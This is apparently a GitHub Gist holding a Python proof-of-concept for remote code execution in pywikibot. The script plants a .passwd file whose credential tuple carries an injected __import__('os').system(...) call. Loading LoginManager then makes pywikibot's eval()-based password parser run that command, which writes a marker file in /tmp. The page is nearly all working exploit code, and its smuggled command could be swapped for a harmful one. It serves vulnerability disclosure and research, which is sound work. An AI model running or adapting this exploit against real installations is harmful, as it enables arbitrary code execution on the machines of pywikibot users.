Created
November 25, 2025 13:29
-
-
Save aydinnyunus/75e2a1ed4475e21a3b59c7f9bcdc7aff to your computer and use it in GitHub Desktop.
RCE via eval() in pywikibot during password parsing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import os | |
| import uuid | |
| from pathlib import Path | |
| # Change to PoC directory | |
| poc_dir = Path(__file__).parent | |
| os.chdir(poc_dir) | |
| # Generate random exploit file name | |
| exploit_filename = f'pwb_rce_{uuid.uuid4().hex[:8]}.txt' | |
| exploit_file = Path(f'/tmp/{exploit_filename}') | |
| # Create .passwd file with malicious code | |
| passwd_content = f"""# Normal password entry | |
| ('testuser', 'testpass') | |
| # Malicious code injection | |
| ('en', 'wikipedia', 'victim', __import__('os').system('touch /tmp/{exploit_filename} && echo "RCE SUCCESSFUL" > /tmp/{exploit_filename}')) | |
| """ | |
| (poc_dir / '.passwd').write_text(passwd_content, encoding='utf-8') | |
| os.chmod(poc_dir / '.passwd', 0o600) | |
| # Import pywikibot - triggers password file parsing | |
| import pywikibot | |
| from pywikibot.login import LoginManager | |
| # Create fake site to avoid network calls | |
| class FakeSite: | |
| def __init__(self): | |
| self.code = 'en' | |
| self.family = type('FakeFamily', (), {'name': 'wikipedia'})() | |
| pywikibot.Site = lambda *args, **kwargs: FakeSite() | |
| # This triggers readPassword() which uses eval() on line 255 | |
| LoginManager() | |
| # Check if RCE was successful | |
| if exploit_file.exists(): | |
| print("[!] RCE SUCCESSFUL!") | |
| print(f"[!] File created: {exploit_file}") | |
| print(f"[!] Contents: {exploit_file.read_text()}") | |
| else: | |
| print("[*] Exploit file not found") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment